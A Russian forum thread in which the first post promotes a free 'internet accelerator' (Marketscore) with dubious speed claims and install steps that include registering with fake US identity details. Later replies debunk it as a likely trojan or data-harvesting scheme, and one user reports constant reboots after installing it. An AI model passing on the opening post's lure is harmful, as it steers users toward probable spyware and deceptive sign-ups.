Сразу хочу сказать, что это не реклама - я просто делюсь тем что нашёл... Ну так вот бродил я как-то по инету и забрёл на сайтик где было написано про "Ускорение интернета в 2 раза", ну я сохранил страничку на хард и забыл. Пару дней назад ознакомился с содержимым и решил попробовать... ...короче ставьте себе не пожалеете!!! ОПИСАНИЕ Ускоритель интернета - это программа, которая способна существенно увеличить скорость работы в интернете. Благодаря мощной сети высокоскоростных серверов, разбросанных по всему миру, ускоряющих передачу файлов и сжимающих информацию, этот бесплатный софт вдвое увеличивает скорость загрузки сайтов, MP3 и различных файлов. Особенно заметна разница на слабых линиях. страница---------без ускор---с ускор---ускорение Mp3search.ru---------23 с---------13 с--------75% Lenta.ru--------------28 с---------15 с--------85% Mail.ru----------------17 с---------9 с---------93% Yandex.ru ------------16 с---------8 с---------100% Rmp.ru----------------22 с---------9 с---------140% !!!Внимательно прочтите инструкцию по установке ускорителя, только предельно четко следуя всем ее пунктам вы сможете правильно настроить программу для комфортной работы. ИНСТРУКЦИЯ ПО УСТАНОВКЕ 1. Для установки заудите на http://areaoffers.com/? 2. На новой странице нажмите на ссылку: More about Marketscore 3. На открывшейся странице нажмите на зеленый баннер вверху или на красную ссылку внизу. 4. На новой странице, в синем окошке "Join Now" нажмите "Next" 5. Заполните небольшую анкету (латинскими буквами): First name - свое имя (например: Tom) Last name - фамилия (например: Jones) E-mail - Введите любой адрес на AOL, вроде [email protected] (замените tom10374 на что-то своё не менее сложное). Country - страна (Внимание! Выбирайте United States) Address - адрес (например: Lenina 17-15-16) City - город (!пишите New York) State - штат (!выбирайте NY) Zip Code - почтовый индекс (!обязательно вводите 10118) Age - возраст (вводите 18 и более) Choose a password - придумайте пароль (123456) Verify Password - тот же пароль еще раз (123456)[/COLOR] На остальные вопросы выбирайте ответы произвольно - это анкетная информация она не имеет принципиальной важности... После заполнения нажмите "Next" внизу страницы. 6. На этой странице поставьте галочку рядом со строкой "Please read our Membership and Privacy Agreements..." и нажмите "Next" внизу. 7. Еще раз нажмите "Next". Программа начнет устанавливаться, подождите пару минут... Затем появиться окно, в котором нажмите "да", а в следующем окне нажмите "ok". !Внимание! Если в процессе установки компьютер выдает ошибку, просто нажмите кнопку "назад" (слева вверху) и повторите пункт 7. 8. Теперь надо ответить на несколько вопросов. вопрос: How many people regularly use this computer to access the Internet for more than email? ответ: 1(only yourself). На остальные вопросы выбирайте ответы произвольно - это анкетная информация она не имеет принципиальной важности... После выбора ответов нажмите кнопку "Next". 9. На этой странице: выберите Gender - пол (male - мужской / female - женский) поставьте галочку под строкой "Head of household". нажмите кнопку "Next" внизу страницы. 10. На этой странице снова ответьте на несколько вопросов и нажмите кнопку "Next" внизу. 11. На этой странице просто нажмите кнопку "Next". 12. На следующей странице нажмите "No Thanks." 13. Перезагрузите компьютер и наслаждайтесь работой ускорителя!
Ускорителей интернета вообще не бывает. Под ускорителями пользоватлеям как правило впаривают трояны всевозможные.
Pochemu ne sushestvuet? Ne znayu esli est` takie progi, no vot kak by on rabotal. Ispol`zyvat` threads(ne znayu kak po ruski. pomoimu "potoki") i razbivat` faily na chast. Naprimer kogda IE zagruzhaet stranicu, on isplo`zuet odin thread i kachat HTML code. Tak vot mozhno razbivat` html cod na chasti i ispol`zyvat` 10 threads chtob skachat` html code. Naprimet kogda ya kachayu odin file s interneta, ya mogu kachat` okolo 500kb/sec, no ya mogu eshe kachat` drugoi file, i skorost` tozhe budet 500kb/s Tak pochemu-by ne ispol`zyavat` dva threada i kachat` odin file 1mb/s P.S. u kazhdogo providera svoi limity na skorost` i na kolichestvo threads
Ну во-первых, далеко не во всех случаях поддерживается многопоточный режим со стороны сервера. Например, если страница генерируется php-скриптом, то понятное дело, что такую страницу скачивать частями нельзя. А во-вторых, если у тебя скорость 500kb/s, то в таком случае ограничение на скорость скорее всего не со стороны клиента, а со стороны сервера. Т.е. сервер не дает качать более 500kb/s. В таком случае многопотоковость действительно дает преимущество. НО если у человека слабый канал, например 32kb/s то ограничения накладывает сама линия клиента, и многопотоковость НИЧЕГО не даст. Суммарная пропускная способность линии все равно будет 32kb/s.
А что касается ускорителей, основанных на сжатии информации, то это конечно вполне реальная вещь, но к сожалению, режим сжатия поддерживает 5% серверов - максимум. А ходить на страницы через какие-то промежуточные сервера, которые сжимают файлы - вещь еще более тормозная, и толку от сжатия скорее всего не будет.
Модем уже сам по себе имеет встроенные протоколы сжатия данных, так что навряд ли это реальная вещь(ускоритель на сжатии). В кач-ве примера: если мы качаем с помощью FlashGet 100 html-страниц с сайта, то они закачаются приблизительно за то же время, как если бы эти страницы были упакованы в один zip-архив
тем более, каким образом заполнение инфы о себе ускорит работу? дальше-лучше, автор сам несет полную бредятину, сохранил страницу говорит и забыл, а она ему видать с винта как то ускоряла... =)) + ламеров ищут....
... в чём бредятина? - ну сохранил - ну забыл - ну ознакомился...а! Дальше не стал описывать, что под "попробовал" я ознакомился с инструкцией по установке -> установил, ну и т.п. (мне кажется что это подразумевальсь).
а вот мне все же кажется, что ты троя впариваешь, будут жалобы - твои подобные темы будут удаляться... (!)
Так некоторые собирают базы e-mail'ов, вот ты регаешься, потом тебе на мыло будет приходить спам. Ты получаешь ускоритель , который ничего не ускоряет а базу емэйлов зарегистрировавшихся юзеров потом продадут спамерам.
Троя мне впаривать не интересно (вроде как "вырос" из ентого "детства")... Да и прога ця не моя. Насчёт троя я тошно не знаю,но я пользуюсь и мне нравится, вот и поделился... Остальное всё зависит только от вас.
В шеге №5 про E-mail написанно следующее: Введите любой адрес на AOL, вроде [email protected] (замените tom10374 на что-то своё не менее сложное)... т.е. о сборе базы e-mail'ов речи не может быть.
а смысл тебе тогда такую рекламу давать? что-то неверится, что все так просто... знаю, ты что-то с этого имеешь, не скажешь что? =))
Я когда прочитал об ентом способе ускорения, то тож сразу неповерил... Начал в инете инфу по ентому поводу собирать и понял шо енто сеть разбросанных серверов которые подключают тя к их ближайшему серверу и енто позволяет "обходить" службы DNS...
их никак не обойти из принципа, на них построено подключение к провайдеру услуг и прочая чушь... (поправьте если не совсем так) - а я вот читаю топик и все больше убеждаюсь, что это полнейшая чушь, разводят на что-нить, подключитесь к серверу, то есть сделаете открытым порт для подключения, а если это бэкдор?
Трой наверное странно очень и Алгол объяснил все доходчиво так что действительно Алгол прав а комп перезагрузи взорвется нахрен =)Лана взорвется не взорвется незнаю но все же
Ну установил я его,перезагрузил комп,ТАК ОН У МЕНЯ ПОТОМ КАЖДЫЕ 5 МИН. СТАЛ ПЕРЕЗАГРУЖАТЬСЯ,покая я эту хрень не удалил!!!,так главное firiwall без спроса её пропустил соединяться!!!(не советую эту хрень устонавливать!!!))_